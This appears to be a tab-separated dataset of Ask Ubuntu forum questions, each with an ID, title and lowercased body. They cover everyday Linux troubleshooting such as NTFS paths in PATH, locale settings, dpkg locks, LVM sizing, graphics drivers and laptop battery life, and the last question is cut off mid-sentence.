311726	javac can not found , even after adding non-standart path to it in $ path	ubuntu 12.10 , 32bit problem too damn simple : i have a ntfs partition and unpacked from .tar.gz jdk on it . all i need from bash , is to see javac compiler , that is located in directory /media/mallniya/data/jdk1.7.0_25/bin . as it advised , i add the path to the javac in $ path like this : export path= $ path : /media/mallniya/data/jdk1.7.0_25/bin output of $ echo $ path : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /media/mallniya/data/jdk1.7.0_25/bin and then i try to found or execute javac and have nothing : output of which javac gives just nothing ; output of ls -l in the /media/ $ username/home/mallniya/jdk1.7.0_25/bin ( without other files ) : -rwxrwxrwx 1 root root 5897 jun 6 06:13 javac output of javac example.java ( example.java do exist , permission is ok ) : bash : /media/mallniya/data/jdk1.7.0_25/bin/javac : permission denied output of sudo javac example.java : sudo : javac : command not found if the same directory jdk1.7.0_25/bin located on the other partition ( ext4 , for example ) , the problem is disappear . i 've found no restrictions about adding path in environment variable $ path , but , obviously , for whatever reason it does n't work with paths of ntfs partition . question : is it possible to add ntfs paths in the $ path ? i understand , that i can use the other path to add in the $ path , but for now i want jdk to stay where it is . thank you . output of cat /proc/mounts : rootfs / rootfs rw 0 0 sysfs /sys sysfs rw , nosuid , nodev , noexec , relatime 0 0 proc /proc proc rw , nosuid , nodev , noexec , relatime 0 0 udev /dev devtmpfs rw , relatime , size=1003380k , nr_inodes=216328 , mode=755 0 0 devpts /dev/pts devpts rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 0 0 tmpfs /run tmpfs rw , nosuid , noexec , relatime , size=202320k , mode=755 0 0 /dev/disk/by-uuid/027924f8-ab47-4304-ab4d-f0586a6734bb / ext4 rw , relatime , errors=remount-ro , data=ordered 0 0 none /sys/fs/cgroup tmpfs rw , relatime , size=4k , mode=755 0 0 none /sys/fs/fuse/connections fusectl rw , relatime 0 0 none /sys/kernel/debug debugfs rw , relatime 0 0 none /sys/kernel/security securityfs rw , relatime 0 0 none /run/lock tmpfs rw , nosuid , nodev , noexec , relatime , size=5120k 0 0 none /run/shm tmpfs rw , nosuid , nodev , relatime 0 0 none /run/user tmpfs rw , nosuid , nodev , noexec , relatime , size=102400k , mode=755 0 0 < br > /dev/sda7 /home ext4 rw , relatime , data=ordered 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , nosuid , nodev , noexec , relatime 0 0 gvfsd-fuse /run/user/mallniya/gvfs fuse.gvfsd-fuse rw , nosuid , nodev , relatime , user_id=1000 , group_id=1000 0 0 < br > /dev/sr0 /media/mallniya/grmculf ( x ) reo_en-ru_dvd udf ro , nosuid , nodev , relatime , uid=1000 , gid=1000 , umask=77 , iocharset=utf8 0 0 < br > /dev/sda3 /media/mallniya/data fuseblk rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 0 0
311727	what exactly happened ? this looks like an attack	i was watching a movie and suddenly i was logged out . when i logged back in , team viewer was started immediately , although it 's not on startup programs . quickly i opened the terminal and gave the command sudo last , but it was not showing anything suspicious . last but not least , no updates were madeââ . any idea ?
311729	how to ubuntu change the plymouth theme ?	is there any safe tool for changing plymouth theme . i found a couple of tools but as i found users commenting that those tools mess up one 's system i did n't try them . can you recommend some good tools ?
311741	radio mobile on ubuntu	does anyone have experience setting up radio mobile , on wine , in ubuntu ? there is such little data online , i am really hoping some could help me with the installation on wine . i tried to use the radio mobile installer but i get the following error : root @ x-k56cb : /home/x # wine downloads/radio_mobile_setup.exe err : module : import_dll library msvbvm60.dll ( which is needed by l '' c : \\radio mobile\\rmweng.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' c : \\radio mobile\\rmweng.exe '' failed , status c0000135 the solution is to install vb6run , which i did using winetricks , but i still keep getting the same error ... is it perhaps because i am installing it in a directory outside of .wine ? thanks
311745	freezes when login , but not with another user	until recently , whenever i login into my account , everything freezes after about 5 seconds . but , if i login into another user account , everything works fine . what should i do ? is there any further information i should provide ( sorry i do n't know what i should and can give you ) ?
311747	which version of python is used on quickly ?	i 'd like to know the python version used on quickly . i could not find the version on the wiki .
311748	opengles code runs gives error : x error of failed request : badrequest ( invalid request code or no such operation )	i am using a intel gma 4500 on my dell vostro 1015 . recently migrated to ubuntu 12.04 . the code compiles successfully but on running gives the above error . after perusing through some more posts , i installed fglrx as well . after that , the error which i get is : libegl warning : failed to create a pipe screen for i965 at this stage glxinfo and glxgears perform as they should . when i did a system reboot , all these seem to be gone . i get the following message when i try to run my program , or use any of the above ( fglrx , glxinfo , glxgears ) : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 20 current serial number in output stream : 20 i did , went through some other posts as well but they were more amd oriented and i could not get it how could they be useful for my intel drivers , if possible .
311751	some websites not accessing still	i have seen this problem before , some of them were solved by changing dns of their network connection . but my problem not solved by doing this . i have tried google dns , but i still have the same problem . i am unable able to access yahoo.com from my browser . what else can i do , i do n't get it . please can someone suggest a way that i can get complete access . thank you . the only thing i am getting in my browser ( firefox ) is waiting for yahoo.com details : ubuntu 13.04 bsnl broadband -dsl connection information : raja @ raja-oem : ~ $ host yahoo.com yahoo.com has address 98.139.183.24 yahoo.com has address 206.190.36.45 yahoo.com has address 98.138.253.109 yahoo.com mail is handled by 1 mta7.am0.yahoodns.net . yahoo.com mail is handled by 1 mta6.am0.yahoodns.net . yahoo.com mail is handled by 1 mta5.am0.yahoodns.net . raja @ raja-oem : ~ $ host yahoo.com 8.8.8.8 using domain server : name : 8.8.8.8 address : 8.8.8.8 # 53 aliases : yahoo.com has address 98.139.183.24 yahoo.com has address 206.190.36.45 yahoo.com has address 98.138.253.109 yahoo.com mail is handled by 1 mta7.am0.yahoodns.net . yahoo.com mail is handled by 1 mta6.am0.yahoodns.net . yahoo.com mail is handled by 1 mta5.am0.yahoodns.net . raja @ raja-oem : ~ $ ping yahoo.com ping yahoo.com ( 98.138.253.109 ) 56 ( 84 ) bytes of data . 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=1 ttl=47 time=404 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=2 ttl=50 time=388 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=3 ttl=47 time=453 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=4 ttl=48 time=433 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=5 ttl=47 time=419 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=6 ttl=50 time=400 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=7 ttl=47 time=433 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=8 ttl=50 time=420 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=9 ttl=47 time=434 ms 64 bytes from ir1.fp.vip.ne1.yahoo.com ( 98.138.253.109 ) : icmp_req=10 ttl=51 time=413 ms [ 1 ] + stopped ping yahoo.com raja @ raja-oem : ~ $ curl -i yahoo.com http/1.1 301 redirect date : sun , 23 jun 2013 13:37:59 gmt connection : close server : yts/1.20.13 cache-control : no-store content-type : text/html content-language : en location : http : //www.yahoo.com/ content-length : 211 raja @ raja-oem : ~ $ progress : i have tried to gain access with https : //www.unifiedremote.com/ but it said that it was an untrusted connection
311760	windows pc not showing on network on ubuntu pc	i 'm trying to establish file and folder sharing between a windows 8 pc , and an ubuntu pc . i 've added both the pc to the same workgroup . i can see the ubuntu pc on my windows network locations . the problem is that , i ca n't see the windows pc on the network location on ubuntu pc . what seems odd to me is , the pc was showing sometimes ago . i do n't know what happened suddenly . i 've installed and configured samba on ubuntu pc . one more strange thing that i saw is , although i 've changed the workgroup for my ubuntu pc , it 's still showing on the default workgroup on the ubuntu network location . can anyone tell me what might went wrong ?
311765	change the exposure date of a photograph	i use shotwell 0.14.1 in ubuntu 13.04 , is there a way of correcting the exposure date of a photograph either by add-ons to shotwell or through a third party application . i have just waited 12 hours for shotwell to index , sort and categorise my large collection of images collected over the past 5 years . however some of the photographs have been included in dated folders that are incorrect . in the screenshot below , the photograph of the green house was taken in malta on the 15th february 2011 and the one on the 19th june 2013 was taken on the 18th february 2011 . the rest of the images from that trip in malta have been filed in the correct place . clicking on the image allows you to change the title and the description , but not the other properties .
311766	intel core i3 vs amd a8-6600k	i would like to buy a new computer but i dont know if the video and network cards will be compatible with linux . processor : intel core i3 cpu model : 3220 processor frequency ( ghz ) : 3.3 standard ram ( gb ) : 4 hdd capacity ( gb ) : 500 optical drive : dvd-rw graphics : intel hd graphics 2500 or processor : amd a8-6600k processor frequency ( ghz ) : 3.9 standard ram ( gb ) : 6 hdd capacity ( gb ) : 1000 optical drive : dvd-rw graphics processor : amd radeon hd 8570d if both are compatible , which one is better . thanks
311767	why is overriding the lang environment variable not changing the language for me ?	i 'm trying to run an application in another language as my current environment . to start out simple , i wanted to change the language of ls . here 's what i read all over the place ( see below for related questions ) : set lang to one of the supported locales , e.g . : lang=nl_nl.utf-8 ls /nonexistent to have it show dutch ( nl ) output . however , i still get english output : $ lang=nl_nl.utf-8 ls -al /nonexistent ls : can not access /nonexistent : no such file or directory my current environment : $ locale lang=en_gb.utf-8 language=en_gb : en lc_ctype= '' en_gb.utf-8 '' lc_numeric= '' en_gb.utf-8 '' lc_time= '' en_gb.utf-8 '' lc_collate= '' en_gb.utf-8 '' lc_monetary= '' en_gb.utf-8 '' lc_messages= '' en_gb.utf-8 '' lc_paper= '' en_gb.utf-8 '' lc_name= '' en_gb.utf-8 '' lc_address= '' en_gb.utf-8 '' lc_telephone= '' en_gb.utf-8 '' lc_measurement= '' en_gb.utf-8 '' lc_identification= '' en_gb.utf-8 '' lc_all= to be sure , i 've checked : the locale is supported : $ grep nl_nl /usr/share/i18n/supported nl_nl.utf-8 utf-8 nl_nl iso-8859-1 nl_nl @ euro iso-8859-15 the locale is generated : sudo locale-gen nl_nl.utf-8 and sudo dpkg-reconfigure locales also shows it 's generated . installed the dutch language pack ( already installed ) : sudo apt-get install language-pack-nl what else have i tried ? using export to set both lang and language instead of prepending the command . setting also lc_all . ironically , some ( only some ! ) gui applications are actually in dutch , but i have n't configured that at all ! i 'm on kubuntu 12.04 ( .2 ) , as far as that matters . similar questions ( to no avail ) : is it possible to change language for user interface temporarily ? how to override the system locale on a single command ? temporarily change language for terminal messages/warnings/errors ( demonstrated to be working , but not working for me ) how do i add locale to ubuntu server ? what 's wrong on my system ? where to debug this further ?
311770	ctrl+r shortcut doesnt work anymore	i was following the standard ubuntu touch app ( currency converter ) , i messed things up with the showcase file , then set everything up again from scratch . only difference being that the ctrl+r shortcut doesnt work anymore , if i use the qmlviewer i get the desired output but not with ctrl+r , infact i get nothing with that . i 've posted an image of the code in qt
311772	how do i know the device path to an usb-stick ?	i have a usb-stick ( used as an installation medium ) . now i need to install a driver from a restricted folder on that device ) . but how do i get the device path to my usb-stick ( e.g . /dev/sda3 so i can mount it using the mount command ? i have read the answer to http : //unix.stackexchange.com/questions/18925/how-to-mount-a-device-in-linux-beginners-confusion but fdisk -l shows nothing to me .
311773	accidentally deleted gnome session , login no longer works	i 'm sorry if this question has been asked already , but i think mine is a very rare case ( if it is ) . so the story goes like this : i was able to `` remove/uninstall '' gnome ui ( i just want to call it ui , and i want the default/stock unity `` ui '' ) . unfortunately , i restarted my system , hoping that unity `` ui '' would be loaded , but there 's no unity ui preinstalled ! i 'm using grub bootloader , ubuntu is installed with windows 7 pro 32 bit ( but on other partition , of course ) . also , i have my preinstalled apps , and i 'm just using ubuntu for about this day only ( yeah , you can call me a noob or whatever ) . in short , i can boot ubuntu properly , but i ca n't log in . i tried to do a recovery , but i aborted it ( foolish , huh ? ) . do i have to do a reinstallation of the os ? or i should type commands in grub bootloader ( if possible ) ? i 'm sorry for my long story , and wrong grammars ( if there are : d ) . do you know any solutions ? quick responses are very appreciated .
311776	how to install drivers for nvidia ( nvs 5200m ) for dell latitude e6430 laptop in ubuntu 13.04	i have a new dell 's laptop e6430 with two vgas ( the intel and nvidia ) . i tried to download the file from the official site of nvidia but it caused the system to crash . i 'm now on a new fresh system . i need detailed instruction for safely installing the driver and also how to switch between the two cards .
311778	my system has 6 gb ram and i3 processor having ubuntu 12.04 64bit installed	my system has 6 gb ram and i3 processor having ubuntu 12.04 64bit installed . when i starts it works well but after sometime when i poweron vmware and chromium browser memory shows by free -m remains just 430 as free and else memory got consumpted by vmware-vmx , vmware , chromium etc i am attaching snapshots of both kindly help me to get rid off this memory overusage issue ? or i have to change the os to windows or any other linux distro : ( thanks raksarora
311779	how do i fix `` dpkg status database is locked by another process '' ?	i got the the following error output when trying to install some package : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? so i ran sudo rm /var/lib/apt/lists/lock sudo rm /var/cache/apt/archives/lock sudo dpkg -- configure -a yet that last command returned dpkg : error : dpkg status database is locked by another process how can i solve this and install packages again ?
311780	win7 host , ubuntu 13.04 guest : virtualbox 4.2.14 seamless mode loses ubuntu launcher	i have windows 7 as host running virtualbox 4.2.14 with ubuntu 13.04 as guest os . all works fine in window or full screen . but if i try seamless mode , i lose the launcher on the left hand side . in fact , i ca n't see anything apart from any apps that had already been open . i have installed guest additions . is this is a problem with virtualbox or windows or ubuntu ?
311784	setting up postfix with apache virtual hosts ?	so , i was trying to setup multiple apache virtual hosts . everything was o.k , lamp worked fine except for one and big problem : postfix . i have two domains . and two php/mysql applications running on each virtual host , with it 's own domain . e.g : i have opencart in domain1.com and wordpress in domain2.com , but postfix send all opencart and wordpress mail from domain1.com or domain2.com . there 's a way to `` fix '' it ?
311791	how to customize ubuntu live cd plymouth theme ?	i am planning to customize ubuntu 13.04 live cd . how is it possible to customize ubuntu live cd plymouth theme in ubuntu 13.04 ?
311801	dependencies nightmare	i 'm trying to install openbts but it requires a bunch of dependencies , some of which fail : the following packages have unmet dependencies : libboost-all-dev : depends : libboost-python-dev but it is not going to be installed libsqlite3-dev : depends : libsqlite3-0 ( = 3.7.9-2ubuntu1 ) but 3.7.9-2ubuntu1.1 is to be installed sqlite3 : depends : libsqlite3-0 ( = 3.7.9-2ubuntu1 ) but 3.7.9-2ubuntu1.1 is to be installed i figure that i can structure the command in such a way as to ignore the different versions on the sqlite stuff and install it anyways ( is this okay ? ) but what i do n't understand is what 's going on with libboost . # apt-get install libboost-all-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libboost-all-dev : depends : libboost-python-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . # apt-get install libboost-python-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libboost-python-dev : depends : libboost-python1.46-dev but it is not going to be installed i thought i might have a different version installed : # apt-get remove libboost-all-dev reading package lists ... done building dependency tree reading state information ... done package libboost-all-dev is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 163 not upgraded . same for this : # apt-get remove libboost-python-dev reading package lists ... done building dependency tree reading state information ... done package libboost-python-dev is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 163 not upgraded . # apt-get install libboost-python1.46-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libboost-python1.46-dev : depends : python-dev but it is not going to be installed could somebody please explain what the heck is going on ? thanks .
311807	how do i install the kernel headers as requested by this error message ?	when i run sudo dpkg -- configure -a i get error ! your kernel headers for kernel 3.2.0-48-generic-pae can not be found . please install the linux-headers-3.2.0-48-generic-pae package . and gets stuck at update-initramfs : generating /boot/initrd.img-3.2.0-48-generic-pae how do i fix this ?
311810	what is `` normal '' activity on the loopback ( lo ) network interface ?	i 'm trying to diagnose intermittent poor wifi performance on my laptop , which has a fresh installation of 13.04 . i installed several network monitoring tools , including `` slurm '' , which i 'm now using to monitor both the wireless interface ( wlan0 ) and the loopback interface ( lo ) . the wireless interface , predictably , shows the same information displayed in the system monitor ; data generally flows at the rate of several hundred kb/second . the loopback interface , however , consistently shows a transaction speed of 5-40 kb/sec , maxing out at around 80-90 . i do n't really understand how ubuntu 's network interfaces work ( plus the complexities of how they interact with network manager ) . is it normal for the lo interface to be so slow ? how does the loopback interface affect networking performance ? can i pretty much ignore it when trying to figure out my wifi problem ?
311815	drivers for nvidia gtx 780m ?	my lab just bought a cyberpowerfang laptop with the new gtx 780m video card and i ca n't find a driver for it . the driver for the gtx 780 ( desktop version ) predictable does n't work . does anyone know of a driver that will work ? thanks .
311819	dual boot with ubuntu 12.04 and 13.04	i have installed 13.04 on the resident 8gb memory in my acer aspire one netbook . i have tried to install 12.04 ( lts ) on the 32gb sd card . on start-up grub shows ubuntu at the top of the list and ubuntu 12.04.2 as the 5th option . pressing for the first option boots into 13.04 . pressing for 12.04 i get a second screen which says : error : no such device : dc627e4-5758-4f80-9516-d2404193a780 . error : file '/boot/vmlinuz-3.5.0-23-generic ' not found . error : you need to load the kernel first . press any key to continue ... _ pressing a key returns me to the first menu . any help in solving this would be appreciated . the acer is not my main computer and i wished to compare the two versions . i do not ( as yet ) have any personal files on this computer and have reinstalled the two versions a couple of times to try to solve this problem without success .
311823	can not override super hotkey	i binded super+a super+s super+z and super+x keys to switch among 1-4 workspaces . super+z and super+x work as expected , but super+a launches search applications , just super launches search and super+s launches workspace switcher . how can i get rid of binded search action on super key ? unity tweak tool does n't have such settings , in system settings there is no even action with binded super key . os : ubuntu 13.04 laptop : lenovo thinkpad
311827	issues with lvm partition size in server 13.04	i am new to ubuntu and a little confused about how hard drive partitions and lvm works . i remember setting up ubuntu server 13.04 and telling to to use 1tb of a 3tb server . well i have maxed that out with blu-ray rips and want the rest of the drive for space . on log-in it says : system load : 2.24 processes : 179 usage of / : 88.7 % of 912.89gb users logged in : 0 memory usage : 6 % ip address for p5p1 : 192.168.0.100 swap usage : 0 % = > / is using 88.7 % of 912.89gb lvdisplay outputs : -- - logical volume -- - lv path /dev/deathstar-vg/root lv name root vg name deathstar-vg lv write access read/write lv creation host , time deathstar , 2013-05-18 22:21:11 -0400 lv status available # open 1 lv size 2.70 tib current le 707789 segments 2 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv path /dev/deathstar-vg/swap_1 lv name swap_1 vg name deathstar-vg lv write access read/write lv creation host , time deathstar , 2013-05-18 22:21:11 -0400 lv status available # open 2 lv size 3.75 gib current le 959 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 vgdisplay outputs : vg name deathstar-vg system id format lvm2 metadata areas 1 metadata sequence no 4 vg access read/write vg status resizable max lv 0 cur lv 2 open lv 2 max pv 0 cur pv 1 act pv 1 vg size 2.73 tib pe size 4.00 mib total pe 715335 alloc pe / size 708748 / 2.70 tib free pe / size 6587 / 25.73 gib df outputs : filesystem 1k-blocks used available use % mounted on /dev/mapper/deathstar -- vg-root 957238932 848972636 59634696 94 % / none 4 0 4 0 % /sys/fs/cgroup udev 1864716 4 1864712 1 % /dev tmpfs 374968 1060 373908 1 % /run none 5120 4 5116 1 % /run/lock none 1874824 148 1874676 1 % /run/shm none 102400 24 102376 1 % /run/user /dev/sda2 234153 56477 165184 26 % /boot and fdisk /dev/sda -l outputs : disk /dev/sda : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . i just do n't know what to make of all this and am not sure how i can make it use all 2.73tbs . thanks in advance for any help . edit -- yes i did make changes to the lvm config , but it didnt do anything . as requested , output of parted -l /dev/sda model : ata wdc wd30efrx-68a ( scsi ) disk /dev/sda : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 2097kb 1049kb bios_grub 2 2097kb 258mb 256mb ext2 3 258mb 3001gb 3000gb lvm model : ata wdc wd30efrx-68a ( scsi ) disk /dev/sdb : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/deathstar -- vg-swap_1 : 4022mb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 4022mb 4022mb linux-swap ( v1 ) model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/deathstar -- vg-root : 2969gb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 2969gb 2969gb ext4
311828	poor wifi signal strength	i have a ralink rt 3290 802.11 bgn adapter & a dlink n600 router . i never get more than 3 bars on my laptop , even when the router is positioned in various places in the house . but i can see full bars on my neighbour 's security protected network , which is farther away and through more walls . is there any way to get my hp laptop to get better signal , or get my router to transmit better ?
311831	changing the mounting point for logical partitions	when i installed ubuntu 12.04 , i did n't know how to properly set the mounting points for the partitioned logical drives . so , i just set it randomly . now when i open the home folder i can not see any of the logical drives on the left pane . i tried to change their mounting point but could n't . the contents of my fstab file /etc folder is : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=691fa0bd-350f-4378-b5c7-82d277dd83c2 / ext4 errors=remount-ro 0 1 # /srv was on /dev/sda8 during installation uuid=753d012e-ac3c-42fd-b388-d83115e88d26 /srv ext4 defaults 0 2 # /tmp was on /dev/sda5 during installation uuid=34d8c35a-7900-4acd-988d-880792849673 /tmp ext4 defaults 0 2 # /usr was on /dev/sda6 during installation uuid=4f7f4287-5feb-4b2b-86bb-93fe74905149 /usr ext4 defaults 0 2 # /var was on /dev/sda7 during installation uuid=e2933e36-7906-48ac-b2ac-93500537cd4a /var ext4 defaults 0 2 my partitions are mounted at the following locations : /dev/sda5 is mounted at /tmp ; /dev/sda6 is mounted at /usr ; /dev/sda7 is mounted at /var ; /dev/sda8 is mounted at /srv . if i attempt to change the contents of fstab file , it says that only root can change the contents . how do i change the mounting points of the partitions such that they show up in the home folder ?
311835	how to get shared bashed history among different tabs	i used the answer in http : //unix.stackexchange.com/a/1292/41729 to enable real-time shared history among separate bash terminals . as explained in the answer above , this is achieved by adding : # avoid duplicates.. export histcontrol=ignoredups : erasedups # append history entries.. shopt -s histappend # after each command , save and reload history export prompt_command= '' history -a ; history -c ; history -r ; $ prompt_command '' this works fine if the bash shells are separate ( e.g . opening different bash terminals using ctrl+alt+t . however it does n't work if i use tabs ( from an open terminal `ctrl+shift+t ) rather than new windows . why this difference in behaviour ? how can i share the bash history also among various tabs ? update : i noticed an unusual behaviour : if i type ctrl+c then the last command typed in any of the other terminals ( both a tab or not ) is correctly displayed . it is like if the ctrl+c forces a flush of the history so that then it is correctly shared . as an example the outputs ( t1 denotes terminal 1 and t2 terminal 2 ) : t1 : ls -lah < enter > # the list of files and directory is shown t2 : cd documents < enter > t1 : < up > ( i.e . i press the up arrow ) ls -lah # i.e the last command in terminal 1 is shown rather than the last of terminal 2 ^c ( i.e . i press ctrl+c ) < up > cd documents # the last command issued in terminal 2 is correctly displayed hope this can offer any hint !
311839	how can i install wine 1.4 on ubuntu 13.04 ?	when i try to install wine 1.4 i get this errors : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) pero 1.16.10ubuntu1 is to be installed depends : libc6 ( > = 2.14 ) pero 2.17-0ubuntu5 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu5 ) but 1.4.1-0ubuntu5 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu5 ) but it is not going to be installed how can i fix it ?
311840	can i calculate the total size of a website available for public ?	say i want to download all public pages or make a off line database of the website www.psychocats.net . now how can i first calculate the total size of the website before start downloading ?
311842	how do i fix apt errors `` w : failed to fetch [ ... ] hash sum mismatch '' ?	i do n't really know what happened , after reboot i got many crash messages , and if i would open firefox or synaptic , they would crash . synaptic returns this : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . then crash icon on the top panel appeared , and there was some error about mergelist . i googled , and found this sudo rm /var/lib/apt/lists/* -vf sudo apt-get update that did n't work . to be able to work in browser i deleted all files in /var/lib/apt/lists . if i try sudo apt-get update , i get this : w : failed to fetch gzip : /var/lib/apt/lists/partial/ua.archive.ubuntu.com_ubuntu_dists_raring_main_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/ua.archive.ubuntu.com_ubuntu_dists_raring_restricted_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/ua.archive.ubuntu.com_ubuntu_dists_raring_universe_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_raring-security_main_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_raring-security_universe_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_raring-security_main_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_raring-security_universe_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . i do not want to reinstall the system . how could i fix that ? thanks . some photos there . i ca n't make screenshots , it crashes : photo 1 photo 2
311848	can not install gnome- or google chrome	i just can not install gnome-shell in my just installed 12.04 lts message : gnome-shell : depends : libgjs0- but it is a virtual package depends : libpulse-mainloop-glib0 ( > = 1:0.99.1 ) but 1:1.1-0ubuntu15.2 is to be installed depends : libpulse0 ( > = 1:0.99.1 ) but 1:1.1-0ubuntu15.2 is to be installed depends : libxfixes3 ( > = 1:5.0 ) but 1:5.0-4ubuntu4 is to be installed depends : gnome-shell-common ( = 3.4.1-0ubuntu2 ) but 3.4.1-0ubuntu2 is to be installed i can not neither install google chrome i am not very good in commands , i 'm a normal user ...
311852	how can i improve the battery life under 12.04 on my inspiron 14z ?	how do i improve the battery life of my inspiron 14z under ubuntu 12.04 ? this laptop gets 4-5 hours of battery life using windows ( e.g . here ) . i 've removed windows , installed ubuntu 12.04 and the initial battery life was only 2 hours . with some tweaks ( described below ) it 's still only ~2.5 hours . for reference , the laptop is the latest model of the 14z : i5-3337u processor 32gb msata , 500gb hdd ( 5400rpm ) amd radeon hd7570m graphics card i have put ext4 partitions on both the ssd and the hdd , and have mounted / to the ssd and /home to the hdd . i also put a 24gb linux swap partition at the start of the hdd , though i figure this wo n't be used all that much ( the laptop has 8gb of ram ) . after googling around and reading ask ubuntu and other sites extensively , i have done the following steps , and they have improved the battery life ~30 minutes ( exact improvement not clear , but battery life is still nowhere near 4-5 hours ) . installed jupiter ( and set performance to `` power saving '' ) installed laptop-mode-tools cat /proc/sys/vm/laptop_mode now outputs 5 ( previously it output 0 ) but it 's not clear that this will help : askubuntu question turned down the brightness of my screen from full to 1/3 other things i have heard about but have not tried for fear of frying the laptop or my linux install : add `` pcie_aspm=force '' at the end of the line with `` quiet splash '' in /boot/grub/grub.cfg enable alpm , but it may already be enabled in 12.04 ? enable i915 framebuffer compression use a propietary driver for the graphics card ? turn off the graphics card ? ( what would happen if i relied on the internal intel bridge ? ) use tlp ? spin down the hdd more aggressively ( howto , but i think laptop-mode-tools does this already ) the only other thing i 've noticed is that plastic just above the f5 , f6 and f7 keys gets really hot . according to jupiter my cpu temperature is only 69 celsius and the system monitor shows cpu load at 7 % so i do n't think it 's the cpu . maybe it 's the graphics card ? also , i 've set up mongodb and lamp on the machine as well . when i run powertop mongodb is high in the list , but i 'm not sure if that 's relevant to battery life because i 'm not actually doing anything with mongodb most of the time . edit : additional info requested by @ gertvdijk $ lspci -nnk | grep -iea3 `` ( graphics|vga ) '' 00:02.0 vga compatible controller [ 0300 ] : intel corporation ivy bridge graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : dell device [ 1028:057f ] kernel driver in use : i915 kernel modules : i915 -- 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati thames [ radeon 7500m/7600m series ] [ 1002:6841 ] subsystem : dell device [ 1028:057f ] kernel driver in use : radeon kernel modules : radeon based on @ maggotbrain 's answer to the question linked to ( here ) , and because i downloaded and ran ubuntu 12.04.2 so i think i already have the quantal enablement stack running . i think uname confirms this too ? $ uname -- all linux christo-lt4 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux edit : amd drivers i initially tried the propietary fglrx drivers with post-release updates . there does not appear to be a bios level option to turn off the amd graphics card . after installing and rebooting , my display looked the same ( except unity launcher icons went back to full size 